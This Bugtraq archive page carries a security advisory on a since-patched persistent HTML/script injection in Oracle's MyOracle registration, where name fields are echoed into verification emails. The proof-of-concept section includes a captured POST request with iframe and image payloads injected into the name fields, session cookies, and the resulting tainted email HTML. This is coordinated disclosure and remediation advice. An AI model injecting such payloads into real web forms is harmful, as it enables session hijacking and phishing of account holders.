Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Oracle Corporation MyOracle - Persistent Vulnerability

From: Vulnerability Lab <research () vulnerability-lab com>
Date: Thu, 18 Sep 2014 13:29:37 +0200
Document Title:
===============
Oracle Corporation MyOracle - Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1261

Oracle Security ID (Team Tracking ID): admin () vulnerability-lab com-001:2014

http://vulnerability-db.com/magazine/articles/2014/09/17/oracle-corporation-fixed-vulnerability-myoracle-online-service-application


Release Date:
=============
2014-09-17


Vulnerability Laboratory ID (VL-ID):
====================================
1261


Common Vulnerability Scoring System:
====================================
3.9


Product & Service Introduction:
===============================
Oracle Corporation is an American multinational computer technology corporation headquartered in Redwood City, 
California, United States. 
The company specializes in developing and marketing computer hardware systems and enterprise software products – 
particularly its own brands 
of database management systems. Oracle is the second-largest software maker by revenue, after Microsoft. The company 
also builds tools for 
database development and systems of middle-tier software, enterprise resource planning (ERP) software, customer 
relationship management (CRM) 
software and supply chain management (SCM) software. Larry Ellison, a co-founder of Oracle, has served as Oracle`s CEO 
throughout its history. 
He also served as the Chairman of the Board until his replacement by Jeffrey O. Henley in 2004. On August 22, 2008, the 
Associated Press 
ranked Ellison as the top-paid chief executive in the world.

(Copy of the Homepage: http://en.wikipedia.org/wiki/Oracle_Corporation )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent vulnerability in the official Oracle Corporation 
`MyOracle` service web-application.


Vulnerability Disclosure Timeline:
==================================
2014-04-28: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-04-30: Vendor Notification (Oracle Sec Alert Security Team)
2014-05-03: Vendor Response/Feedback (Oracle Sec Alert Security Team)
2014-09-01: Vendor Fix/Patch (Oracle Developer Team - Acknowledgments 2014 October CPU Advisory)
2014-09-17: Public Disclosure (Vulnerability Laboratory)



Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A filter and persistent input validation mail encoding web vulnerability has been discovered in the official Oracle 
Corporation `MyOracle` service web-application.
The vulnerability allows to bypass the regular web/system validation to inject own script codes in outgoing emails of 
the account system mail server service.

The vulnerability is located in the name values of the my-oracle `registration` module. Remote attackers are able to 
inject in the first and lastname input fields of the 
registration formular own script codes via POST method request. The injected script code activates the account mail 
service notification which returns with the persistent 
code in the myoracle token activation site. The issue impact a critical risk because an attacker is able to inject own 
tokens or can manipulate the full mail body context.
Further send notification mails by the myoracle service can also be affected by the issue. The encoding of the server 
does not recognize outgoing service mails which 
results in the persistent issue in outgoing emails. The injection point is a profile values update or directly the 
remote registration itself. The security risk of the 
persistent mail encoding and filter web vulnerability is estimated as medium with a cvss (common vulnerability scoring 
system) count of 3.9.

Exploitation of the vulnerability requires low user interaction and no privileged application user account. Successful 
exploitation results in persistent session hijacking 
attacks, unauthorized external redirects to malicious sources and persistent manipulation of affected or connected 
module context.

Request Method(s):
                                [+] POST

Vulnerable Service(s):
                                [+] MyOracle

Vulnerable Module(s):
                                [+] Registration (exp.)

Vulnerable Parameter(s):
                                [+] Profile name values (firstname & lastname ...)


[Sender]:
                                [+] oracle-acct_ww () oracle com

[Receiver]:
                                [+] admin () evolution-sec com & bkm () evolution-sec com


Proof of Concept (PoC):
=======================
The persistent mail encoding web vulnerability can be exploited by remote attackers with low user interaction and 
without privileged application user account.
For security demonstration or to reproduce the persistent mail encoding web vulnerability follow the provided 
information and steps below to continue.

Sender Mailbox - Main Oracle Server
oracle-acct_ww () oracle com

Affected Mailbox - Receiver/Victim
admin () evolution-sec com
bkm () evolution-sec com


Inject via Profile (POST)
https://myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx?nextURL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=3


Inject via Registration (POST)
https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2~656BF073~675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0


After Inject (REDIRECT OPTIONS)
https://myprofile.oracle.com/EndUser/faces/profile/notifyPage.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2~656BF073~675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0


-- PoC Session Logs [POST] ---

20:16:31.280[4105ms][total 4105ms] Status: 302[Moved Temporarily]
POST 
https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2%7E656BF073%7E675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0
 Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[720] Mime Type[text/html]
   Request Header:
      Host[myprofile.oracle.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      
Referer[https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2%7E656BF073%7E675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0]
      
Cookie[optimizelySegments=%7B%22174383146%22%3A%22ff%22%2C%22174203172%22%3A%22false%22%2C%22173164270%22%3A%22direct%22%7D;
 optimizelyEndUserId=oeu1398447211204r0.7026125166698021; optimizelyBuckets=%7B%7D; s_cc=true; 
s_fid=343B504EB719CF63-1174BEDEC7EE3C0B; s_nr=1398449779754; 
gpw_e24=https%3A%2F%2Fmyprofile.oracle.com%2FEndUser%2Ffaces%2Fprofile%2FcreateUser.jspx%3FnextURL%3Dhttps%253A%252F%252Flogin.oracle.com%252Fpls%252Forasso%252Forasso.wwsso_app_admin.ls_login%253FSite2pstoreToken%253Dv1.2%257E656BF073%257E675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0;
 
s_sq=oracleglobal%3D%2526pid%253Dprofile%25253Aen-us%25253Acreate-user%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257BTrPage._autoSubmit('f1'%25252C'usr_srv_otn'%25252Cevent%25252C1)%25253Breturntrue%25253B%25257D%2526oidt%253D2%2526ot%253DCHECKBOX;
 p_org_id=1001; p_lang=US; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=3; 
atgPlatoStop=1; 
BreadCrumb=%257BlevelName%253A%253A%253Cspan%2520style%253D%2522color%253ARED%253B%2520font-weight%253Abold%253B%2520font-size%253A11px%253B%2522%253EOracle%253C/span%253E%2520University%2520Home%2523%2523levelUrl%253A%253A/pls/web_prod-plq-dad/db_pages.getpage%253Fpage_id%253D3%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D;
 JSESSIONID=GBTGThlDQtGWmKXcVyTT5SF2LNBpRNGJ65Ls1KTZSjRf5rXvxm8L!1006513418!189473844; 
BIGipServermktap_myprofile_cache_pool=1729139341.26910.0000; notice_preferences=2:cb8350a2759273dccf1e483791e6f8fd; 
s_eVar21=CLD-hp-panel-build-business-intelligence]
      Connection[keep-alive]
   POST-Daten:
      ops[Bitte+w%C3%A4hlen+Sie+...]
      drm[Sie+m%C3%BCssen+%7B0%7D+eingeben.]
      drsm[Sie+m%C3%BCssen+f%C3%BCr+%7B0%7D+mindestens+ein+Element+ausw%C3%A4hlen]
      err[FEHLER]
      reqd[Erforderliches+Feld.]
      lqws[https%3A%2F%2Floqate.oracle.com%2FLoqate%2FLoqate]
      unamefield[admin%40evolution-sec.com]
      passwd1[Keymaster148%21]
      passwd2[Keymaster148%21]
      givenname[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      middlename[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      sn[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      usr_jtitle[pentester]
      usr_ctry[41]
      usr_state[6]
      usr_cty[Kassel]
      companyname[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      usr_line1[bremerstrasse+1337]
      usr_line2[]
      usr_postal_code[34125]
      telephonenumber[573246234]
      usr_srv_otn[t]
      usr_srv_cio[t]
      usr_nsl_psn[t]
      org.apache.myfaces.trinidad.faces.FORM[f1]
      _noJavaScript[false]
      javax.faces.ViewState[%2118erzf7qoc]
      event[]
      source[cb1]
      partial[]
   Response Header:
      
Location[https://myprofile.oracle.com/EndUser/faces/profile/notifyPage.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2%7E656BF073%7E675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0]
      X-Frame-Options[sameorigin]
      Content-Type[text/html]
      Content-Language[en]
      Content-Encoding[gzip]
      Server[Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=122956956898568077,0)]
      Content-Length[720]
      Vary[Accept-Encoding]
      Date[Fri, 25 Apr 2014 18:16:45 GMT]
      Connection[keep-alive]






PoC: Exploitcode in Mail

<html><head>
<title>Bitte verifizieren Sie Ihren Oracle Account</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table class="header-part1" cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td><b>Betreff: 
</b>Bitte verifizieren Sie Ihren Oracle Account</td></tr><tr><td><b>Von: </b>oracle-acct_ww () oracle 
com</td></tr><tr><td><b>Datum: </b>25.04.2014 20:16</td></tr></tbody></table><table class="header-part2" 
cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td><b>An: </b>admin () evolution-sec 
com</td></tr></tbody></table><br>
<meta http-equiv="Content-Type" content="text/html; "><table cellpadding="0" cellspacing="0" align="center" border="0" 
width="640"><tbody><tr><td style="border-top:#CCCCCC solid 1px; border-right:#CCCCCC solid 1px; border-bottom:#CCCCCC 
solid 1px; border-left:#CCCCCC solid 1px; background-color:#FFFFFF;"><table cellpadding="0" cellspacing="0" border="0" 
width="100%"><tbody><tr><td style="background-color:#FF0000;"><a href="http://www.oracle.com"; target="_blank"><img 
src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/302715.gif"; alt="Oracle Corporation" 
border="0" height="30" hspace="12" width="123"></a></td></tr><tr><td style="padding:15 15 15 15; font-family:Arial, 
Helvetica, sans-serif; font-size:12px; color:#333333;">Sehr geehrte(r) "><iframe 
src="http://www.vulnerability-lab.com";>%20"><img src="x">,<br><br>Bitte klicken Sie zum Bestätigen Ihres Accounts auf 
den folgenden Link. Der Link ist 5 Tage lang gültig.<br><br><a 
href="https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jspx?key=E28D4AFE3C2186C40C5E110F90FED0ADAE4262F73D46C4E7987F609FD0257E4AA51B6E896C85084916A06DF9F740618EAEE6EC45B3A302FAD49E2516B405A9FE";><font
 color="#FF0000">Link zur Accountverifizierung</font></a><br><br>Ihr Oracle Benutzername: admin () evolution-sec 
com<br><br><b>Warum Email Verifizierung?</b><br><li>Schutz Ihrer Daten</li><li>Zugriff auf Oracle Anwendungen und 
Websites, die eine Verifizierung erfordern</li><br><br><b>Der Link zur Accountverifizierung funktioniert 
nicht?</b><br>Sollte der obige Link nicht funktionieren können Sie zur Verifizierung Ihrer Emailadresse auch die 
folgende URL kopieren und in Ihren Browser 
einfügen:<br><br>[https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jspx?key=E28D4AFE3C2186C40C5E110F90FED0ADAE4262F73D46C4E7987F609FD0257E4AA51B6E896C85084916A06DF9F740618EAEE6EC45B3A302FAD49E2516B405A9FE]<br><br><b>Sie
 wollen eine weitere Bestätigungsemail generieren?</b><br>1) <a 
href="https://myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx"; target="_blank"><font 
color="#FF0000">Melden Sie sich bei Ihrem Account an.</font></a><br>2) Klicken Sie auf den Link "Account verifizieren" 
oder "Account erneut verifizieren". <br><br>Vielen Dank.<br>Das Oracle Account Team</font><br><br><hr 
style="color:#CCCCCC; height:1px;" /><strong>Richtlinien:</strong><br><font size="1">Bitte bedenken Sie, dass Ihre 
Nutzung der Oracle Websites und Services der <a href="http://www.oracle.com/us/legal/privacy/index.html"; 
target="_blank"><font color="#FF0000">Oracle Datenschutzrichtlinie</font></a> und den <a 
href="http://www.oracle.com/us/legal/index.html"; target="_blank"><font color="#FF0000">Servicebedingungen</font></a> 
unterliegt.<br><br>Verwaltung Ihres Benutzerkontos: Bitte aktualisieren Sie Ihre Emailadresse bei etwaigen Änderungen, 
damit wir Ihnen im Falle von Problemen mit dem Kontozugriff behilflich sein können. Melden Sie sich dafür zunächst 
an und klicken Sie dann auf den Link "Benutzernamen ändern" auf Ihrer Oracle Account-Seite.<br><br>Aktualisieren der 
Kommunikationseinstellungen für Ihre Emailadresse: Bitte melden Sie sich bei Ihrem Account an, um die Einstellungen 
der Kommunikationseinstellungen für Ihre Emailadresse zu aktualisieren.<br><br>Sie haben diese Email erhalten, da vor 
kurzem für diese Emailadresse ein Benutzerkonto auf der Oracle Website erstellt wurde. Wenn Sie in letzter Zeit kein 
Benutzerkonto auf der Oracle Website erstellt haben, <a href="http://apex.oracle.com/pls/otn/f?p=42988:3"; 
target="_blank"><font color="#FF0000">senden</font></a> Sie uns eine Hilfsanfrage.<br><br>Bei Zugriffs- oder 
Anmeldeproblemen <a href="http://apex.oracle.com/pls/otn/f?p=42988:3:2527260596859682::NO:::"; target="_blank"><font 
color="#FF0000">klicken Sie bitte hier</a>.</font><br></tr><tr><td style="padding:15 15 15 15; border-top:#CCCCCC solid 
1px; border-bottom:#CCCCCC solid 1px;"><a href="http://www.oracle.com/us/corporate/index.html"; target="_blank"><img 
src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/196263.gif"; alt="Hardware and Software 
Engineered to Work Together" width="174" height="50" border="0" /></a></td></tr><tr><td><table width="100%" border="0" 
cellpadding="0" cellspacing="0"><tr><td height="25" style="padding:0 0 0 15;"><font face="Arial, Helvetica, sans-serif" 
size="1" color="#333333">Copyright 2014, Oracle. Alle Rechte vorbehalten.</font></td><td align="right" style="padding:0 
15 0 0;"><font face="Arial, Helvetica, sans-serif" size="1" color="#333333"> <a 
href="http://www.oracle.com/de/corporate/contact/index.html"; target="_blank"><font color="#FF0000" size="1" 
face="Arial, Helvetica, sans-serif"><u>Kontakt</u></font></a> | <a href="http://www.oracle.com/us/legal/index.html"; 
target="_blank"><font color="#FF0000" size="1" face="Arial, Helvetica, sans-serif"><u>Rechtliche Hinweise und 
Nutzungsbedingungen</u></font></a> | <a href="http://www.oracle.com/us/legal/privacy/index.html"; target="_blank"><font 
color="#FF0000" size="1" face="Arial, Helvetica, 
sans-serif"><u>Datenschutz</u></font></a></font></td></tr></table></td></tr></table></td></tr></table></body></html>
</body>
</html>
</iframe></td></tr></tbody></table></td></tr></tbody></table></body></html>


Script Code Payload:

<iframe src="http://www.vulnerability-lab.com";>%20"><img src="http://evolution-sec.com/sites/default/files/65-2_0.png";>




Reference(s):
https://myprofile.oracle.com/
https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jspx
https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=x
https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken


Picture(s):
                                ../1.png
                                ../2.png
                                ../3.png


Resource(s):
                                ../Account verifizieren.htm
                                ../Bitte verifizieren Sie Ihren Oracle Account.html
                                ../Bitte verifizieren Sie Ihren Oracle Account_poc.html
                                ../poc.txt


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable first- and last-name input fields in 
the myoracle application.
Encode stored data of user in the dbms when processing to send service notifications by the mail info@oracle email to 
prevent persistent injection attacks.


Security Risk:
==============
The security risk of the persistent mail encoding web vulnerability in the myoracle account system web-server is 
estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm () evolution-sec com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all 
warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. 
Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss 
of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such 
damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack 
into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                             - www.evolution-sec.com
Contact:    admin () vulnerability-lab com      - research () vulnerability-lab com            - admin () evolution-sec 
com
Section:    www.vulnerability-lab.com/dev       - forum.vulnerability-db.com                   - 
magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                - 
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability 
Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the 
use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, 
videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, 
list (feed), 
modify, use or edit our material contact (admin () vulnerability-lab com or research () vulnerability-lab com) to get a 
permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research () vulnerability-lab com
Previous By Date Next
Previous By Thread Next

Current thread: